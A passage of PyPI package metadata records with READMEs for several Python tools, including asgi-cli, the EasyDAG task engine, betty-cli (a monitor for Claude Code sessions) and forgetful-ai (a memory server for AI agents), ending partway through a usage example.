mypy sshplex
vulture sshplex tests --min-confidence 80
# Local Consul for testing
docker-compose -f docker-compose.consul.yml up -d
```
## Contributing
SSHplex welcomes contributions! The codebase follows the KISS principle.
## License
MIT License - see [LICENSE](LICENSE) for details.
## Author
**Sabrimjd** - [@sabrimjd](https://github.com/sabrimjd)
## Acknowledgments
- [Textual](https://textual.textualize.io/) - Modern TUI framework
- [NetBox](https://netbox.dev/) - Infrastructure source of truth
- [HashiCorp Consul](https://www.consul.io/) - Service discovery
- [tmux](https://github.com/tmux/tmux) - Terminal multiplexing
- [loguru](https://github.com/Delgan/loguru) - Logging
---
**SSHplex** - Because managing multiple SSH connections should be simple and elegant.
| text/markdown | null | MJAHED Sabri <contact@sabrimjahed.com> | null | null | MIT | ssh, tmux, multiplexer, netbox, tui, terminal | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: System :: Networking",
"Topic :: System :: Systems Administration",
"Topic :: Terminals"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"pynetbox==7.6.1",
"textual==8.0.0",
"pyyaml==6.0.3",
"pydantic==2.12.5",
"loguru==0.7.3",
"rich==14.3.2",
"libtmux==0.53.1",
"pyperclip==1.11.0",
"python-consul2>=0.1.5; extra == \"consul\"",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"black>=22.0.0; extra == \"dev\"",
"flake8>=5.0.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"ruff>=0.8.0; extra == \"dev\"",
"vulture>=2.11; extra == \"dev\"",
"types-PyYAML>=6.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/sabrimjd/sshplex",
"Repository, https://github.com/sabrimjd/sshplex",
"Documentation, https://github.com/sabrimjd/sshplex#readme",
"Bug Tracker, https://github.com/sabrimjd/sshplex/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:33:53.942041 | sshplex-1.3.1.tar.gz | 62,622 | 1b/e3/58701c7e3e6f0814d8e31d566558d200d1e593fc57cdd39520e3b615bc8c/sshplex-1.3.1.tar.gz | source | sdist | null | false | 6bcd93586edc33f6745b648461545054 | bdaa81972fb5153ada67599f07a8b9991ce2144e1642680dbb0581ab5735dc4f | 1be358701c7e3e6f0814d8e31d566558d200d1e593fc57cdd39520e3b615bc8c | null | [
"LICENSE"
] | 209 |
2.4 | asgi-cli | 0.4.5 | Call ASGI Python application from command line, just like CURL | # ASGI CLI

[](https://coveralls.io/github/akornatskyy/asgi-cli?branch=master)
[](https://badge.fury.io/py/asgi-cli)
Call [ASGI](https://asgi.readthedocs.io/en/latest/index.html)
Python application from command line, just like CURL.
If you’re using this tool, **★Star** this repository to show your interest, please!
## Install
```sh
pip install -U asgi-cli
```
## Usage
```sh
asgi-cli --help
```
```text
usage: asgi_cli [-h] [-V] [--app-dir APP_DIR] [-X METHOD] [-H HEADER]
[-d DATA | -F MULTIPART] [-I | -b | -p | -v]
[--root-path ROOT_PATH] [-n NUMBER]
app [url]
positional arguments:
app an application module
url a uniform resource locator or path (default /)
options:
-h, --help show this help message and exit
-V, --version show program's version number and exit
--app-dir APP_DIR look for APP in the specified directory, by adding this to the PYTHONPATH
-X, --request METHOD specify request method to use, e.g. POST (default GET)
-H, --header HEADER pass custom header line, e.g. -H='Accept: application/json'
-d, --data DATA request body data, e.g. '{"msg":"hello"}', 'msg=hello'
-F, --form MULTIPART specify HTTP multipart POST data, e.g. name=value or name=@file
-I, --head show status and headers only
--root-path ROOT_PATH
set the ASGI 'root_path'
-b, --benchmark issue a number of requests through repeated iterations (reports
throughput and average call time)
-p, --profile prints out a report of top 10 functions ordered by internal time, saves to
'stats.cprof' file
-n NUMBER a number of requests to issue (default 100K)
-v, --verbose make the operation more talkative
```
## Examples
_example.py_:
```python
START = {
"type": "http.response.start",
"status": 200,
"headers": [
(b"content-length", b"13"),
(b"content-type", b"text/html; charset=utf-8"),
],
}
BODY1 = {"type": "http.response.body", "body": b"Hello"}
BODY2 = {"type": "http.response.body", "body": b", world!"}
async def app(scope, receive, send) -> None:
await send(START)
await send(BODY1)
await send(BODY2)
```
Then run the examples:
`asgi-cli example:app` prints response body:
```text
Hello, world!
```
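Behind the scenes, a tool like asgi-cli builds an ASGI scope, supplies `receive`/`send` callables, and awaits the app. A condensed stand-in (illustrative only, not asgi-cli's actual code), reusing an app shaped like the example above:

```python
import asyncio

async def app(scope, receive, send):
    # Same shape as example.py above, condensed into one handler.
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"Hello, world!"})

async def call_app(app, path="/"):
    messages = []  # collect every message the app sends

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        messages.append(message)

    scope = {"type": "http", "method": "GET", "path": path,
             "query_string": b"", "headers": []}
    await app(scope, receive, send)
    return messages

messages = asyncio.run(call_app(app))
body = b"".join(m.get("body", b"") for m in messages
                if m["type"] == "http.response.body")
print(body.decode())  # → Hello, world!
```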
`asgi-cli -v example:app` pretty prints scope and sent messages:
```text
{'scope': {'asgi': {'spec_version': '2.1', 'version': '3.0'},
'client': ('127.0.0.1', 49327),
'headers': [(b'accept', b'*/*'),
(b'user-agent', b'asgi-cli/0.0.1'),
(b'host', b'127.0.0.1:8000')],
'http_version': '1.1',
'method': 'GET',
'path': '/',
'query_string': b'',
'raw_path': b'/',
'root_path': '',
'scheme': 'http',
'server': ('127.0.0.1', 8000),
'type': 'http'}}
{'message': {'headers': [(b'content-length', b'13'),
(b'content-type', b'text/html; charset=utf-8')],
'status': 200,
'type': 'http.response.start'}}
{'message': {'body': b'Hello', 'type': 'http.response.body'}}
{'message': {'body': b', world!', 'type': 'http.response.body'}}
```
`asgi-cli -b example:app` shows execution stats (runs in 3 iterations, for each iteration displays requests per second and an average call time):
```text
#1 => 477.74K, 2.09μs
#2 => 438.12K, 2.28μs
#3 => 446.90K, 2.24μs
```
| text/markdown | null | Andriy Kornatskyy <andriy.kornatskyy@live.com> | null | null | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/akornatskyy/asgi-cli"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:33:34.330779 | asgi_cli-0.4.5.tar.gz | 11,712 | 12/25/26b5ffb7f867aee18c8ccbcd56aaa5417a248202fd2f8014d28e9e38cb8e/asgi_cli-0.4.5.tar.gz | source | sdist | null | false | 29755f1dfd7aba2412e27121f3ce5ac6 | 17122e36e0a80935314e8bb78ab3c7685e07e163d47e3b80df3e2f7ab6f16fc4 | 122526b5ffb7f867aee18c8ccbcd56aaa5417a248202fd2f8014d28e9e38cb8e | null | [
"LICENSE"
] | 169 |
2.4 | graph-protocol | 0.1 | Privatized | # graph-protocol | text/markdown | null | Marta Jones González <martajon10@gmail.com> | null | null | null | null | [
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"contourpy",
"cycler",
"dafsa",
"et-xmlfile",
"fonttools",
"graphviz",
"kiwisolver",
"matplotlib",
"networkx",
"numpy",
"openpyxl",
"packaging",
"pandas",
"pillow",
"pyparsing",
"python-dateutil",
"pytz",
"scipy",
"six",
"tzdata"
] | [] | [] | [] | [
"Homepage, https://github.com/martaajonees/graph-protocol",
"Issues, https://github.com/martaajonees/graph-protocol/issues"
] | twine/6.2.0 CPython/3.14.0 | 2026-02-20T09:31:45.611865 | graph_protocol-0.1.tar.gz | 139,655 | ae/c9/e2cd40855426a072a6ba3889f891e2216023e264aae25c3d5922ff88afe3/graph_protocol-0.1.tar.gz | source | sdist | null | false | 88ea414dae79d2988c75c2aaaad0f9cd | 3ed9efe6482dbe5baa26db6300bf85cfc043640eb7eecc752b72196a716c710f | aec9e2cd40855426a072a6ba3889f891e2216023e264aae25c3d5922ff88afe3 | MIT | [
"LICENSE"
] | 173 |
2.4 | clip-protocol | 0.1 | Privatized | # graph-protocol | text/markdown | null | Marta Jones González <martajon10@gmail.com> | null | null | null | null | [
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"contourpy",
"cycler",
"dafsa",
"et-xmlfile",
"fonttools",
"graphviz",
"kiwisolver",
"matplotlib",
"networkx",
"numpy",
"openpyxl",
"packaging",
"pandas",
"pillow",
"pyparsing",
"python-dateutil",
"pytz",
"scipy",
"six",
"tzdata"
] | [] | [] | [] | [
"Homepage, https://github.com/martaajonees/graph-protocol",
"Issues, https://github.com/martaajonees/graph-protocol/issues"
] | twine/6.2.0 CPython/3.14.0 | 2026-02-20T09:31:44.028795 | clip_protocol-0.1.tar.gz | 139,666 | 6e/b1/136d0b48c016fd0092ce32d7ed105db4eb818bcbfc86999766f0848479e6/clip_protocol-0.1.tar.gz | source | sdist | null | false | eaca86583c0adf294381f778e9389865 | 1742c81df73e23734f551f37089fadb663f312e948650b1fa39c381cf7277898 | 6eb1136d0b48c016fd0092ce32d7ed105db4eb818bcbfc86999766f0848479e6 | MIT | [
"LICENSE"
] | 149 |
2.3 | EasyDAG | 0.2.3 | A lightweight multiprocessing DAG execution engine with message queues and external control options. | # EasyDAG
**EasyDAG** is a lightweight, multiprocessing-friendly Directed Acyclic Graph (DAG) execution engine for Python.
It lets you define task nodes, declare dependencies, and execute them in parallel — while emitting structured lifecycle events and inter-process messages for logging, progress reporting, or external systems such as web dashboards.
EasyDAG is designed to be **simple, explicit, and embeddable**, without the operational overhead of workflow schedulers.
---
## Key Features
* ⚙️ Define DAGs using plain Python functions
* ⚡ Parallel execution via `multiprocessing`
* 🧠 Automatic dependency resolution
* 📬 Multiprocess-safe message queue for side effects
* 🧵 Message handlers run safely in the main process
* 🪝 Lifecycle hooks via a clean interface (ABC)
* 🛑 Cancellation, fail-fast, and timeout support
* 🌐 Optional WebSocket interface for live monitoring & control
* 📦 No external runtime dependencies for the core engine
---
## Installation
```bash
pip install easydag
```
---
## Quick Start
```python
from EasyDAG import EasyDAG, DAGNode

def task_a():
    return 2

def task_b(id_a):
    return id_a * 10

dag = EasyDAG(processes=4)
dag.add_node(DAGNode("id_a", task_a))
dag.add_node(DAGNode("id_b", task_b))
dag.add_edge("id_a", "id_b")

outputs = dag.run()
print(outputs)
```
---
## Core Concepts
### DAG
A **DAG** is a set of nodes with directed dependencies. A node may only execute once all of its dependencies have completed successfully.
EasyDAG guarantees:
* No node runs before its dependencies
* Each node runs at most once (unless retried)
* Independent nodes run in parallel
---
### DAGNode
Each node wraps:
* A callable function
* Static positional and keyword arguments
* Retry configuration (optional)
```python
DAGNode(
node_id="A",
func=process_data,
args=(10,),
kwargs={"foo": "bar"},
max_retries=2
)
```
Dependencies are resolved automatically by matching upstream node IDs to function parameters.
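The parameter-name matching described above can be sketched in plain Python. The `resolve_inputs` helper below is an illustrative stand-in, not EasyDAG's actual implementation:

```python
import inspect

def resolve_inputs(func, completed_outputs):
    """Pick keyword arguments for `func` from upstream results whose
    node IDs match the function's parameter names.

    Illustrative sketch only; EasyDAG's real resolution may differ.
    """
    params = inspect.signature(func).parameters
    return {name: completed_outputs[name]
            for name in params if name in completed_outputs}

def task_b(id_a):
    return id_a * 10

outputs = {"id_a": 2}            # results of finished upstream nodes
kwargs = resolve_inputs(task_b, outputs)
print(task_b(**kwargs))          # 20
```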
---
## Message Queue System (Side Effects)
EasyDAG includes an optional **multiprocessing-safe message queue** designed for side effects:
* Logging
* Progress updates
* Metrics
* Database writes
* External notifications
This keeps compute nodes pure and avoids unsafe shared state.
---
### Defining a Queue
```python
from EasyDAG import MultiprocessQueue
queue = MultiprocessQueue()
dag = EasyDAG(processes=4, mp_queue=queue)
```
---
### Registering Handlers (Main Process)
Handlers always run in the **main process**, never in workers.
```python
def log_progress(payload):
print("Progress:", payload)
queue.register_message_handler("progress", log_progress)
```
---
### Sending Messages from Nodes
If a node function includes the reserved `message_queue` parameter, EasyDAG injects it automatically.
```python
from EasyDAG import QueueMessage  # assuming QueueMessage is exported like MultiprocessQueue

def process_data(x, message_queue=None):
    message_queue.put(
        QueueMessage("progress", {"value": x})
    )
    return x * 2
```
If the parameter is omitted, the queue is not passed.
---
## Lifecycle Interface (Execution Hooks)
EasyDAG exposes a formal **interface abstraction** via an abstract base class:
```python
from EasyDAG import EasyInterface
```
This allows you to observe and control execution without coupling logic to the engine.
### Supported Hooks
* `dag_started`
* `dag_finished`
* `node_started`
* `node_progress`
* `node_finished`
* `node_errored`
* `run()`
* `cancel()`
You can implement your own interface to:
* Emit events
* Drive UIs
* Collect metrics
* Integrate APIs
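A minimal implementation might look like the following sketch. `LifecycleInterface` and the hook signatures here are stand-ins for the real `EasyInterface`, whose exact API may differ:

```python
from abc import ABC, abstractmethod

# Stand-in for EasyDAG's EasyInterface ABC; the real hook signatures
# may differ. This only illustrates the shape of an implementation.
class LifecycleInterface(ABC):
    @abstractmethod
    def node_started(self, node_id): ...
    @abstractmethod
    def node_finished(self, node_id, result): ...

class MetricsCollector(LifecycleInterface):
    """Records node results: one way to 'collect metrics'."""
    def __init__(self):
        self.finished = {}
    def node_started(self, node_id):
        print(f"started {node_id}")
    def node_finished(self, node_id, result):
        self.finished[node_id] = result

m = MetricsCollector()
m.node_started("id_a")
m.node_finished("id_a", 2)
print(m.finished)   # {'id_a': 2}
```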
---
## Cancellation & Fail-Fast
EasyDAG supports:
* **User-initiated cancellation**
* **Fail-fast execution**
* **Execution timeouts**
Cancellation halts scheduling of new nodes and can be configured to terminate or safely complete in-flight tasks.
Execution outcome is tracked explicitly via DAG status (success, failed, cancelled, timeout).
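The fail-fast semantics can be sketched with a shared flag. This illustrates the behaviour only, not EasyDAG's internals:

```python
import threading

# Illustrative fail-fast sketch (not EasyDAG's internals): once the
# shared event is set, no further nodes are scheduled.
cancel = threading.Event()

def schedule(nodes):
    ran = []
    for node_id, func in nodes:
        if cancel.is_set():        # cancellation halts new scheduling
            break
        try:
            func()
            ran.append(node_id)
        except Exception:
            cancel.set()           # fail-fast: first error cancels the rest
            ran.append(node_id)    # the failing node did execute
    return ran

def ok(): pass
def boom(): raise RuntimeError("failed")

ran = schedule([("a", ok), ("b", boom), ("c", ok)])
print(ran)   # ['a', 'b']
```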
---
## WebSocket + FastAPI Demo
A full working example is available at:
📁 `https://github.com/Mechatronicist/easyDAG-Web`
### What the demo shows
* Building a DAG
* Emitting node & DAG lifecycle events
* Streaming events over WebSockets
* Starting and cancelling execution from the browser
* Viewing live progress in real time
---
## When to Use EasyDAG
EasyDAG is ideal when you need:
* A **local, Python-native DAG engine**
* Parallel execution with dependencies
* Fine-grained control over execution
* Lightweight orchestration without infrastructure
* A simpler alternative to:
* Airflow
* Prefect
* Ray
* Dask
| text/markdown | Mechatronicist | null | null | null | MIT License Copyright (c) 2025 Mechatronicist Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | dag, multiprocessing, parallel, tasks, workflow | [] | [] | null | null | >=3.9 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/mechatronicist/EasyDAG",
"Repository, https://github.com/mechatronicist/EasyDAG",
"Issues, https://github.com/mechatronicist/EasyDAG/issues"
] | twine/5.1.1 CPython/3.12.7 | 2026-02-20T09:31:03.468195 | easydag-0.2.3.tar.gz | 18,759 | f2/e8/73f3befc3d26c0a86fb8aa9aa493fd74fa4960d7951da2dcaf9c88bd3faf/easydag-0.2.3.tar.gz | source | sdist | null | false | 95b85ea7b8393ee2deb4e3f2564bc612 | 62684c472c87c8e52f6b96b4d1faba734f84a729414ee9699a3ec68488a7c9c0 | f2e873f3befc3d26c0a86fb8aa9aa493fd74fa4960d7951da2dcaf9c88bd3faf | null | [] | 0 |
2.4 | betty-cli | 0.14.0 | A CLI supervisor for Claude Code sessions | <p align="center">
<img src="docs/assets/logo.png" alt="Betty" width="120">
</p>
# Betty
A real-time TUI monitor for Claude Code sessions.
## Install
```bash
curl -fsSL https://betty4.sh/install.sh | bash
```
Or directly with uv / pip:
```bash
uvx betty-cli # run without installing
uv tool install betty-cli # install permanently
pip install betty-cli # with pip
```
## Use
```bash
# Start betty
betty
# In another terminal, run Claude Code as usual
claude
```
The companion auto-detects your session. No hooks or configuration needed.
## Options
| Flag | Description |
|------|-------------|
| `--global`, `-g` | Watch all projects |
| `--worktree`, `-w` | Watch across git worktrees |
| `--style` | UI style (`rich` or `claude-code`) |
| `--version`, `-v` | Show version |
## Commands
| Command | Description |
|---------|-------------|
| `config` | Configure LLM summarization and UI settings |
| `mock --demo` | Generate mock sessions for development |
## Keybindings
### Navigation
| Key | Action |
|-----|--------|
| `j/k` | Navigate turns |
| `g/G` | Jump to beginning/end |
| `1-9` | Switch sessions |
| `h/l` | Switch panels (manager expand mode) |
### Display
| Key | Action |
|-----|--------|
| `o` / `Space` / `Enter` | Expand/collapse turn or span |
| `e/c` | Expand/collapse all |
| `f` | Cycle filters (All, Spans, Tools, Read, Write, Edit, Bash) |
| `s/S` | Toggle summaries / Summarize all |
### Views
| Key | Action |
|-----|--------|
| `M` | Toggle manager view |
| `T` | Toggle tasks view |
| `P` | Toggle plan view |
| `I` | Toggle insights (analysis) panel |
### Analysis & Annotations
| Key | Action |
|-----|--------|
| `A` | Analyze selected turn/span/session |
| `[`/`]` | Zoom analysis level (turn / span / session) |
| `n` | Annotate selected turn |
| `a` | Toggle/clear alerts |
### Agent
| Key | Action |
|-----|--------|
| `B` | Toggle agent panel (closed / full / compact) |
| `?` | Ask Betty a question about the session |
### Other
| Key | Action |
|-----|--------|
| `O` | Open PR in browser |
| `x` | Export to Markdown |
| `m` | Edit monitor instructions |
| `D` | Delete session |
| `Esc` | Close panel / clear selection |
| `q` | Quit |
## Betty Agent
Betty Agent is a continuous session observer that tracks what Claude Code is doing and flags problems in real time. It combines heuristic detectors with optional LLM-powered narrative and drift detection.
### Enable
```bash
betty config --agent
```
Or set the environment variable `BETTY_AGENT_ENABLED=true`.
### What it does
- **Goal tracking** — extracts the session goal and current objective, updating as the user gives new instructions
- **Progress assessment** — classifies sessions as `on_track`, `stalled`, or `spinning` using error rates, retry patterns, and tool diversity
- **Error spike detection** — warns when error rate exceeds 40% in recent tool calls
- **Retry loop detection** — flags when the same tool is called 3+ times consecutively
- **Stall detection** — notices gaps of 2+ minutes between turns
- **File change tracking** — logs Read/Write/Edit operations with line counts
- **Milestones** — marks every 10th tool call and 5th user message
- **LLM narrative** (optional) — generates a 2-3 sentence situation report describing current activity
- **Goal drift detection** (optional) — compares recent activity against the session goal and warns if the assistant has gone off track
- **Ask Betty** — press `?` to ask a natural-language question about the session; Betty answers citing turn numbers and file paths
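As an illustration, the retry-loop heuristic above could be implemented along these lines. `detect_retry_loop` is hypothetical, not Betty's actual detector:

```python
def detect_retry_loop(tool_calls, threshold=3):
    """Flag when the same tool appears `threshold`+ times in a row.
    Hypothetical sketch only; not Betty's actual code."""
    run_tool, run_len = None, 0
    for tool in tool_calls:
        if tool == run_tool:
            run_len += 1
        else:
            run_tool, run_len = tool, 1
        if run_len >= threshold:
            return run_tool
    return None

print(detect_retry_loop(["Read", "Bash", "Bash", "Bash", "Edit"]))  # Bash
print(detect_retry_loop(["Read", "Edit", "Bash"]))                  # None
```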
### Configuration
The agent uses your existing LLM configuration (set via `betty config`). LLM features (narrative, drift detection, goal determination, Ask Betty) require a configured LLM provider. Heuristic detectors work without one.
| Setting | Default | Description |
|---------|---------|-------------|
| `enabled` | `false` | Enable the agent (opt-in) |
| `update_interval` | `5` | Minimum turns between LLM updates |
| `max_observations` | `50` | Max observations kept per session |
Observations and reports are cached to disk (`~/.cache/betty/`) and persist across restarts.
## License
MIT
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.0",
"filelock>=3.0",
"litellm>=1.50",
"rich>=13.0",
"textual>=0.50",
"tomli-w>=1.0",
"tomli>=2.0; python_version < \"3.11\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:30:43.691718 | betty_cli-0.14.0.tar.gz | 101,956 | 61/af/d81d8c8dfe6b49267ad60694eae09fc8bf44d677245810e136a755529e7a/betty_cli-0.14.0.tar.gz | source | sdist | null | false | 08cdf45b949a0ebf76539702a3e84cc9 | c2c0f1ee91a9f291783e6ec2316557941a786392971bfea794d4bbf25bd1b7ec | 61afd81d8c8dfe6b49267ad60694eae09fc8bf44d677245810e136a755529e7a | null | [] | 240 |
2.4 | forgetful-ai | 0.2.3 | MCP Server for AI Agent Memory - persistent, semantically-searchable memory for AI agents | # Forgetful



[](https://github.com/jlowin/fastmcp)
[](https://github.com/qdrant/fastembed)
[](https://discord.gg/ngaUjKWkFJ)
**Forgetful** is a storage and retrieval tool for AI Agents, designed as a Model Context Protocol (MCP) server built on the FastMCP framework. Once connected to this service, MCP clients such as coding agents, chat bots, or your own custom-built agents can store and retrieve information from the same knowledge base.

---
## Table of Contents
- [Overview](#overview)
- [Features](#features)
- [Quick Start](#quick-start)
- [Usage Examples](#usage-examples)
- [How It Works](#how-it-works)
- [Configuration](#configuration)
- [Documentation](#documentation)
- [Contributing](#contributing)
- [License](#license)
---
## Overview
A lot of us are using AI Agents now, especially in the realm of software development. The pace at which work and decisions are made can make it difficult to keep up from a note-taking and context-persistence perspective.
So if you are following something like the [BMAD Method](https://github.com/bmad-code-org/BMAD-METHOD) for example and you want to take your brain storming session you've just had with Claude on your desktop/mobile and use it for the basis of your next Claude Code session, then having a shared knowledge base across the two agents can help with this.
This is just one example use case to illustrate the point, more and more agentic applications are going to surface and the use cases for sharing data across them is going to increase.
Knowledge bases are going to become a key infrastructure component for your interactions with AIs. There are many excellent knowledge base solutions available (many for free on GitHub) and I would encourage you to check them out and find one that works for you (even if Forgetful doesn't). From personal experience, interactions with my agents got easier and more rewarding once they knew more about me, my work, and the previous interactions I had had with them or other AI systems.
What makes **Forgetful** different from other memory-based MCP services is that it takes a rather opinionated view on how AI Agents should store and retrieve data.
**Forgetful** imposes the [Zettelkasten principle](https://en.wikipedia.org/wiki/Zettelkasten) when clients wish to record memories: each memory must be atomic (one concept per note). Along with the note (title and content), we ask the client/agent to provide context about what it was doing when creating the note, plus keywords and tags. From this information we create and store semantic embeddings to aid later retrieval, and we automatically link the memory to existing memories above a given similarity score, allowing a knowledge graph to be constructed automatically.
In this sense **Forgetful** becomes a little bit like Obsidian for AI Agents, where the auto-linking nudges them into building up a graph of their knowledge.
We find, [as do others (A-MEM: Agentic Memory for LLM Agents)](https://arxiv.org/abs/2502.12110), that all this helps ensure that when the agent later requires relevant information from the memory system, the correct information is returned.
In addition to just memories, **Forgetful** also has the concept of entities (think organisation, people, products), projects, documents and code artifacts, all of which can be associated with one or more memories.

## Features
- Configure either **STDIO** or **HTTP** transport (or stand up two services to support both)
- Multiple authentication flows supported; see the [FastMCP docs](https://github.com/jlowin/fastmcp/tree/main/docs/servers/auth) for the full list
- Meta tool discovery: only three tools are exposed to the client application, preserving its context window
- Flexible storage: SQLite (default, zero-config) or PostgreSQL (for scale and production deployments)
- Stores memories as vectors, allowing them to be retrieved via natural-language queries from AI agents
- Cross-encoder reranking to improve recall and precision of memory retrieval
- Flexible ranking (embedding and cross-encoder) providers; run everything locally without cloud calls thanks to FastEmbed
- Automatic linking of semantically similar memories, automating the creation of the knowledge graph
For the complete roadmap, see [Features Roadmap](docs/features_roadmap.md).
---
## Quick Start
### Option 1: PyPI (Recommended)
```bash
# Run directly with uvx (no installation needed)
uvx forgetful-ai
# Or install globally
uv tool install forgetful-ai
forgetful
```
Data stored in platform-appropriate locations (`~/.local/share/forgetful` on Linux/Mac, `AppData` on Windows).
By default, runs with stdio transport for MCP clients. For HTTP:
```bash
uvx forgetful-ai --transport http --port 8020
```
### Option 2: From Source
```bash
git clone https://github.com/ScottRBK/forgetful.git
cd forgetful
# Install dependencies with uv
uv sync
# Run the server (uses SQLite by default)
uv run main.py
```
The server starts with stdio transport. For HTTP: `uv run main.py --transport http`
### Option 3: Docker Deployment (Production/Scale)
Forgetful provides two Docker deployment options:
#### SQLite with Docker (Simpler, Single-Container)
See [docker-compose.sqlite.yml](/docker/docker-compose.sqlite.yml)
```bash
cd docker
cp .env.example .env
# Edit .env: Set DATABASE=SQLite and SQLITE_PATH=data/forgetful.db
docker compose -f docker-compose.sqlite.yml up -d
```
The SQLite database persists in the `./data` directory on the host.
#### PostgreSQL with Docker (Recommended for multitenant)
See [docker-compose.postgres.yml](/docker/docker-compose.postgres.yml) and [.env.example](/docker/.env.example)
```bash
cd docker
cp .env.example .env
# Edit .env: Set DATABASE=Postgres and configure POSTGRES_* settings
docker compose -f docker-compose.postgres.yml up -d
```
**Note**: If no `.env` file exists, the application uses defaults from `app/config/settings.py`.
For all configuration options, see [Configuration Guide](docs/configuration.md).
### Connecting to An Agent
For detailed connection guides (Claude Code, Claude Desktop, other clients that support MCP), see [Connectivity Guide](docs/connectivity_guide.md).
- [Claude Code](docs/connectivity_guide.md#claude-code)
- [Copilot CLI](docs/connectivity_guide.md#copilot-cli) (includes [custom agents and skills](docs/copilot-cli/README.md))
- [Cursor](docs/connectivity_guide.md#cursor)
- [Codex](docs/connectivity_guide.md#codex)
- [Gemini CLI](docs/connectivity_guide.md#gemini-cli) (includes [custom commands](docs/gemini-cli/README.md))
- [Opencode](docs/connectivity_guide.md#opencode) (includes [custom commands and skills](docs/opencode/README.md))
Add Forgetful to your MCP client configuration:
**stdio transport (recommended for local use):**
```json
{
"mcpServers": {
"forgetful": {
"type": "stdio",
"command": "uvx",
"args": ["forgetful-ai"]
}
}
}
```
**HTTP transport (for Docker/remote):**
```json
{
"mcpServers": {
"forgetful": {
"type": "http",
"url": "http://localhost:8020/mcp"
}
}
}
```
---
## Usage Examples
Forgetful exposes tools through a **meta-tools pattern** - only 3 tools visible to your MCP client, with 42 tools accessible via `execute_forgetful_tool`. See [Complete Tool Reference](docs/tool_reference.md) for all tools.
### Example 1: Project-Scoped Memory
Create a memory linked to a project for better organization and scoped retrieval.
```python
# Create project for organizing related knowledge
project = execute_forgetful_tool(
"create_project",
{
"name": "E-Commerce Platform Redesign",
"project_type": "work",
"status": "active"
}
)
# Create memory linked to project
memory = execute_forgetful_tool(
"create_memory",
{
"title": "Payment gateway: Stripe chosen over PayPal",
"content": "Selected Stripe for better API docs, lower fees, and built-in fraud detection. PayPal lacks webhooks for subscription management.",
"importance": 9,
"tags": ["payment", "stripe", "decision"],
"project_id": project["project_id"]
}
)
# Later, query within project scope
results = execute_forgetful_tool(
"query_memory",
{
"query": "payment processing implementation",
"project_id": project["project_id"]
}
)
# Returns: Stripe decision + auto-linked related memories
```
### Example 2: Knowledge Graph with Entities
Track people, organizations, and relationships - perfect for team and infrastructure management.
```python
# New engineer joins your company
new_hire = execute_forgetful_tool(
"create_entity",
{
"name": "Jordan Taylor",
"entity_type": "Individual",
"description": "Backend Engineer - Payments Team",
"tags": ["engineering", "backend", "payments"]
}
)
# Get company entity (create if needed)
company = execute_forgetful_tool(
"create_entity",
{
"name": "TechFlow Systems",
"entity_type": "Organization",
"description": "SaaS platform company"
}
)
# Create employment relationship
execute_forgetful_tool(
"create_entity_relationship",
{
"from_entity_id": new_hire["entity_id"],
"to_entity_id": company["entity_id"],
"relationship_type": "works_for",
"metadata": {
"role": "Backend Engineer II",
"department": "Payments",
"start_date": "2025-01-20"
}
}
)
# Create memory about hiring
hire_memory = execute_forgetful_tool(
"create_memory",
{
"title": "Jordan Taylor hired - payments focus",
"content": "Jordan joins to build Stripe integration and handle PCI compliance. Previous experience with payment systems at FinanceApp Corp.",
"importance": 7,
"tags": ["team", "hiring", "payments"]
}
)
# Link person to memory
execute_forgetful_tool(
"link_entity_to_memory",
{
"entity_id": new_hire["entity_id"],
"memory_id": hire_memory["memory_id"]
}
)
# Query Jordan's related knowledge
results = execute_forgetful_tool(
